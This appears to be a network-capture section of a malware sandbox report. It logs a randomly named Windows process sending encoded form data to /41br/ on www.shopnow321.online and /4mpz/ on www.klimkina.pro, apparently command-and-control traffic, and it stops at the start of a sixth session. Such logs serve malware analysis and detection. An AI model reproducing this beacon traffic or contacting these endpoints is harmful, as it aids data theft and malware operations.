65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49717	162.241.2.254	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:09.829421997 CEST	709	OUT	POST /41br/ HTTP/1.1 Host: www.shopnow321.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.shopnow321.online Referer: http://www.shopnow321.online/41br/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 41 65 68 44 73 72 79 72 34 66 47 6b 71 2f 63 72 32 69 6c 56 31 4f 6d 50 36 78 6c 6b 6a 65 67 55 63 48 37 63 54 36 46 4c 77 72 76 52 5a 30 37 79 58 74 63 6c 4b 68 51 74 50 78 59 78 54 42 77 6b 53 61 79 65 49 53 30 7a 51 79 57 43 4a 72 75 36 42 71 78 5a 51 4a 74 4c 58 35 46 50 75 63 50 58 36 76 5a 46 39 54 64 37 58 35 63 64 6e 79 5a 72 53 58 51 34 7a 38 7a 75 66 73 63 47 44 67 38 34 5a 68 43 59 6e 34 35 35 4c 4e 48 65 79 77 6e 4d 76 42 48 31 63 4a 76 63 4e 36 52 73 36 55 43 68 53 50 57 7a 41 5a 77 2b 59 46 71 49 6e 30 2b 51 47 54 66 6d 65 6b 35 41 32 6f 59 3d Data Ascii: I2ID3h=37p05Z2HjoMoAehDsryr4fGkq/cr2ilV1OmP6xlkjegUcH7cT6FLwrvRZ07yXtclKhQtPxYxTBwkSayeIS0zQyWCJru6BqxZQJtLX5FPucPX6vZF9Td7X5cdnyZrSXQ4z8zufscGDg84ZhCYn455LNHeywnMvBH1cJvcN6Rs6UChSPWzAZw+YFqIn0+QGTfmek5A2oY=
May 30, 2024 15:02:10.334723949 CEST	1121	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:02:10 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 836 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED] Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1LuD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p\| 8J8-QXXD,B"^#n$uP"8\|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49718	162.241.2.254	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:12.367937088 CEST	729	OUT	POST /41br/ HTTP/1.1 Host: www.shopnow321.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 227 Origin: http://www.shopnow321.online Referer: http://www.shopnow321.online/41br/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 42 2f 52 44 71 4b 79 72 39 2f 47 6e 6d 66 63 72 68 79 6c 52 31 4f 36 50 36 30 45 76 6a 6f 59 55 66 6d 4c 63 42 4f 52 4c 7a 72 76 52 42 45 37 7a 54 74 63 75 4b 68 55 6c 50 7a 63 78 54 46 59 6b 53 62 43 65 4c 68 63 79 51 69 57 45 42 4c 75 34 50 4b 78 5a 51 4a 74 4c 58 35 42 6c 75 63 48 58 39 65 70 46 38 32 70 34 55 35 63 65 33 53 5a 72 42 48 51 43 7a 38 7a 41 66 75 34 38 44 6b 4d 34 5a 6a 4b 59 6e 73 6c 36 42 4e 48 69 74 67 6e 59 76 69 57 50 62 2f 6d 64 48 6f 34 65 69 57 47 4f 58 35 37 5a 61 37 34 57 4c 6c 47 77 33 6e 32 6e 58 6a 2b 50 45 48 70 77 6f 2f 4e 6a 57 36 49 56 4f 71 4b 72 58 4c 6c 34 51 67 57 62 42 63 52 70 Data Ascii: I2ID3h=37p05Z2HjoMoB/RDqKyr9/GnmfcrhylR1O6P60EvjoYUfmLcBORLzrvRBE7zTtcuKhUlPzcxTFYkSbCeLhcyQiWEBLu4PKxZQJtLX5BlucHX9epF82p4U5ce3SZrBHQCz8zAfu48DkM4ZjKYnsl6BNHitgnYviWPb/mdHo4eiWGOX57Za74WLlGw3n2nXj+PEHpwo/NjW6IVOqKrXLl4QgWbBcRp
May 30, 2024 15:02:12.890940905 CEST	1121	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:02:12 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 836 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED] Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1LuD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p\| 8J8-QXXD,B"^#n$uP"8\|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49719	162.241.2.254	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:14.896195889 CEST	1746	OUT	POST /41br/ HTTP/1.1 Host: www.shopnow321.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1243 Origin: http://www.shopnow321.online Referer: http://www.shopnow321.online/41br/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 42 2f 52 44 71 4b 79 72 39 2f 47 6e 6d 66 63 72 68 79 6c 52 31 4f 36 50 36 30 45 76 6a 72 34 55 66 55 7a 63 54 63 35 4c 79 72 76 52 49 6b 37 75 54 74 63 33 4b 6c 77 68 50 7a 42 4f 54 48 51 6b 53 35 4b 65 4f 51 63 79 65 69 57 45 4e 72 75 35 42 71 78 4d 51 4a 64 50 58 35 52 6c 75 63 48 58 39 63 68 46 31 44 64 34 59 5a 63 64 6e 79 5a 6e 53 58 52 4d 7a 2f 44 32 66 75 39 4c 44 31 77 34 5a 41 69 59 68 66 4e 36 4e 4e 48 6b 75 67 6d 66 76 69 61 71 62 2b 50 6d 48 6f 67 30 69 55 57 4f 58 2f 57 66 50 4a 45 5a 58 45 65 2f 2f 45 4f 79 58 44 2b 30 45 42 35 68 6c 6f 78 34 65 72 77 70 4f 50 61 57 52 70 73 6e 48 46 71 73 44 62 41 62 47 2b 63 34 6d 75 53 59 53 67 67 52 64 31 5a 69 4c 31 7a 45 56 68 53 51 4e 41 2f 43 30 57 53 6b 45 4f 42 75 41 57 59 59 31 53 66 2f 4f 45 6e 4f 30 71 53 76 6d 70 68 50 70 4a 31 4d 6e 41 46 72 75 45 65 78 32 51 43 4e 53 6a 6b 75 72 78 33 44 49 6e 65 75 64 63 51 6d 62 2f 67 4f 52 39 68 39 31 6d 53 32 30 67 71 5a 34 56 4b 32 52 72 58 [TRUNCATED] Data Ascii: I2ID3h=37p05Z2HjoMoB/RDqKyr9/GnmfcrhylR1O6P60Evjr4UfUzcTc5LyrvRIk7uTtc3KlwhPzBOTHQkS5KeOQcyeiWENru5BqxMQJdPX5RlucHX9chF1Dd4YZcdnyZnSXRMz/D2fu9LD1w4ZAiYhfN6NNHkugmfviaqb+PmHog0iUWOX/WfPJEZXEe//EOyXD+0EB5hlox4erwpOPaWRpsnHFqsDbAbG+c4muSYSggRd1ZiL1zEVhSQNA/C0WSkEOBuAWYY1Sf/OEnO0qSvmphPpJ1MnAFruEex2QCNSjkurx3DIneudcQmb/gOR9h91mS20gqZ4VK2RrXpHKrOf5WAGFRvKuux0u+w8smCX6rr1pfIe4T6Io/9dadHY1hIFP2pXyb4SL99QbaAYVjm+/ldYoSnaAQnWrRSwFC8wGOWnm9YGukcOhJVcHe6emtRPuxgq00LTbS4B8uKCkGNe9YMjmDLQbQ3TEugIztHEO7SvUqNY1syg/gLOmC4/AkaWR/W82WsxMoSu8mklaIWNyGSX4W00Qg0Kx5BiHEtpIi+W35gHgG4J7i4ifh+CDkJLXVV8ZZQS0N45WrgQlw1J8zNwG4GMoSslGPZhPDkKdY56iQf5vt/6NM2SUjbu8kLROFpOZ7d7ez4VO+1+C2Y+Opn0No3hO9mvhXMijRkzkbQibla2vwKuNwmDZ5vk08XLcxEWpyyLJKBytOmGWAbNSt3BzJukLwjcEkIaXGZdLq1fZngcTjofseKrc6DhZr8sbjwU0tav7HqvMc8LY6iNMVqXM1DCFZHQ7OODw9RMa09tXUdcOqr7oWKVXgmwgyjkgMbfw7RMN/YQLjZJ8MmclKdCdH7a/mpe1BByD2ZVPAZMdDHeXTLgNmPpN+0kKmWJXll7aObz33SdxL78TNc7D198vzP4oN+fTA/zA8xFV15IFNXVqX3U1HuCDXruXKS4pg80l1delCl8NDVd3wN3OaBhFGElpU9nRCmuNGwoRdhAO8er [TRUNCATED]
May 30, 2024 15:02:15.400264025 CEST	1121	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:02:15 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 836 Content-Type: text/html Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED] Data Ascii: nFeE.H:$AX-G;6F)b]MN9Pfz{wbka+fI\|)DVh[`%t\|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1LuD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p\| 8J8-QXXD,B"^#n$uP"8\|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49720	162.241.2.254	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:17.759708881 CEST	443	OUT	GET /41br/?aN6=3TWTWTzxVTU&I2ID3h=65BU6tOk0p5LPOIIq5f29seWsrYdgC5c7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rYjy1JJSSd8gZV48OK5h4nt3TyfM9xWMZVLxRvlpiI2JcoA== HTTP/1.1 Host: www.shopnow321.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:02:18.273046017 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 30 May 2024 13:02:18 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Mon, 03 Oct 2022 20:19:07 GMT Accept-Ranges: bytes Content-Length: 2361 Vary: Accept-Encoding Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domnio Grtis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x19
May 30, 2024 15:02:18.273075104 CEST	224	IN	Data Raw: 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70 Data Ascii: 2"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-
May 30, 2024 15:02:18.273083925 CEST	1163	IN	Data Raw: 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 38 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 3e 0d 0a 20 20 20 20 Data Ascii: touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.css" rel="stylesheet"> <link href="/cgi-sys/css/fonts.css" rel="stylesheet"> <link href="/cgi-sys/css/custom_404

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49721	185.137.235.125	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:02:23.540354967 CEST	694	OUT	POST /4mpz/ HTTP/1.1 Host: www.klimkina.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 207 Origin: http://www.klimkina.pro Referer: http://www.klimkina.pro/4mpz/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko Data Raw: 49 32 49 44 33 68 3d 56 38 45 58 6f 32 66 38 74 5a 31 79 75 4e 64 70 48 66 30 65 4c 30 4a 2f 2f 34 69 52 44 31 63 77 4c 77 79 66 6e 54 54 46 79 54 55 42 37 36 43 68 75 2b 38 55 6f 50 2f 53 39 71 58 37 51 4f 41 38 62 30 65 6a 42 43 2b 37 69 31 2f 66 56 47 42 58 59 7a 63 7a 6c 42 72 6b 71 4e 56 62 79 69 43 4c 73 4c 71 64 57 6c 73 63 56 55 73 4f 76 66 2b 71 53 78 70 74 53 48 63 69 59 30 64 6e 70 6b 39 39 32 62 63 52 43 72 33 58 57 64 72 38 78 75 41 57 53 39 73 48 49 6b 4a 32 6e 66 51 44 75 33 65 51 74 78 63 66 34 61 71 4f 2f 79 70 70 31 4e 63 75 39 64 6d 4d 5a 74 65 2b 48 30 55 6b 38 4f 47 53 50 50 4b 2b 51 2b 41 3d Data Ascii: I2ID3h=V8EXo2f8tZ1yuNdpHf0eL0J//4iRD1cwLwyfnTTFyTUB76Chu+8UoP/S9qX7QOA8b0ejBC+7i1/fVGBXYzczlBrkqNVbyiCLsLqdWlscVUsOvf+qSxptSHciY0dnpk992bcRCr3XWdr8xuAWS9sHIkJ2nfQDu3eQtxcf4aqO/ypp1Ncu9dmMZte+H0Uk8OGSPPK+Q+A=
May 30, 2024 15:02:24.327908039 CEST	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.0 Date: Thu, 30 May 2024 13:02:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID5=b7224a2c55f73912ed5aea08aea05ecf; expires=Sun, 30-Jun-2024 13:02:24 GMT; Max-Age=2678400; path=/;Priority=High; domain=www.klimkina.pro; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: dd_bdfhyr=fcec6ab861b9f608541014f48f1d8d6b; expires=Fri, 31-May-2024 13:02:24 GMT; Max-Age=86400; path=/; secure; HttpOnly Server-version: 07 Content-Encoding: gzip Data Raw: 35 34 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 a5 57 5f 8f db 44 10 7f 4e 3e c5 d4 3c 14 a4 ae 7d 7f ab eb 9d 13 89 b6 07 14 15 81 a0 3c a0 aa 42 1b 7b 1d ef 65 bd eb 7a d7 c9 05 f1 40 5b 81 00 21 21 f1 ce 43 bf c1 15 f5 0a 2d ed f1 15 ec 6f c4 ec da c9 a5 77 b9 5e 39 22 25 f6 ee ce cc ce cc fe e6 37 9b 30 e6 63 d0 66 2a 58 cf cb 69 1c 73 39 24 46 e5 db b0 b1 92 ef 7b fd 6e 37 0c 50 02 9f dd f0 d2 cd 4f 6f dc f9 ea b3 5d 48 4d 26 fa dd d0 3e 40 50 39 ec 79 4c a2 68 98 32 1a f7 bb 80 9f 30 63 86 a2 9c c9 09 bb 5f f2 71 cf bb a1 a4 61 d2 90 3b d3 9c 79 10 35 a3 9e 67 d8 be 09 ac a1 1d 88 52 5a 68 66 7a a5 49 c8 96 07 41 bf db 09 0d 37 82 f5 3f 64 e6 86 2a 71 11 08 ec 16 85 2a e0 26 4b 68 29 4c 18 34 02 28 e9 36 94 34 c3 30 c6 9c 4d 72 55 98 85 6d 26 3c 36 69 2f 66 63 1e 31 e2 06 57 80 4b 6e 38 15 44 47 14 83 5f f5 57 6c b4 9d f0 12 21 70 5b 51 9b 08 b8 ae 94 d1 a6 a0 39 10 62 dd 11 5c 8e 20 2d 58 d2 f3 82 bc 1c 08 1e 05 89 a0 86 94 3c 18 cc 44 83 48 eb e3 91 8f 23 0f 0a 26 7a 9e 4b b2 4e 19 33 a7 37 fa [TRUNCATED] Data Ascii: 54bW_DN><}<B{ez@[!!C-ow^9"%70cfXis9$F{n7POo]HM&>@P9yLh20c_qa;y5gRZhfzIA7?dq&Kh)L4(640MrUm&<6i/fc1WKn8DG_Wl!p[Q9b\ -X<DH#&zKN37o<yyF(;kEO%7\I}RgADY)}tS]Aqk]A%02D}!@W`2o-{uT.'7~4oX0+T/ExrBo@Vw8-ZJSU6}U__BS@SKHH"AD2d$\}aV?.W:EEK$
May 30, 2024 15:02:24.327929020 CEST	763	IN	Data Raw: d3 c2 33 72 46 a4 2a 32 ac d1 96 99 8e 2d b5 8c 15 73 9d 63 64 db 30 10 2a 1a ed 00 38 89 4e 98 ae cf 38 6d 2e c1 25 56 2f 23 ad 60 6b 70 1b d6 91 e6 1c d7 ed c0 40 15 31 2b b6 61 0b 67 b4 12 3c 86 77 d6 37 36 ae 6d ee 7a fd ea b7 ea a8 fa b3 7a Data Ascii: 3rF2-scd08N8m.%V/#`kp@1+ag<w76mzzUU:&dS'y~;~CA\_e\N~XWXh~C^<W9WOCCKx3G`QO;?!Pu!$&vKq3oMZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	185.137.235.125	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
